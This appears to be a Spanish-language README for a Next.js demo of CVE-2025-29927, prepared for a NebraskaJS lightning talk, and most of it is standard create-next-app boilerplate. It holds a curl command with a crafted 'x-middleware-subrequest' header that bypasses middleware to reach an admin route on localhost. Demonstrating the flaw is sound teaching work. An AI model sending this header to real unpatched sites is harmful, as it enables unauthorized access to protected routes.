
Una demo de la vulnerabilidad CVE-2025-29927 para una charla relámpago de NebraskaJS
Este es un proyecto de Next.js creado con create-next-app.
Primero, puedes confirmar que el middleware funciona y debería redirigir al usuario:
curl http://localhost:3000/api/admin
Luego, puedes mostrar cómo se está evadiendo el middleware con el siguiente comando:
curl -H "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware" http://localhost:3000/api/admin
Primero, ejecuta el servidor de desarrollo:
npm run dev
# o
yarn dev
# o
pnpm dev
# o
bun dev
Abre http://localhost:3000 con tu navegador para ver el resultado.
Puedes empezar a editar la página modificando app/page.tsx. La página se actualiza automáticamente mientras editas el archivo.
Este proyecto usa next/font para optimizar y cargar automáticamente Geist, una nueva familia tipográfica para Vercel.
Para aprender más sobre Next.js, echa un vistazo a los siguientes recursos:
Puedes consultar el repositorio de Next.js en GitHub - ¡tus comentarios y contribuciones son bienvenidos!
La forma más sencilla de desplegar tu aplicación de Next.js es usar la Plataforma Vercel de los creadores de Next.js.
Consulta nuestra documentación de despliegue de Next.js para más detalles.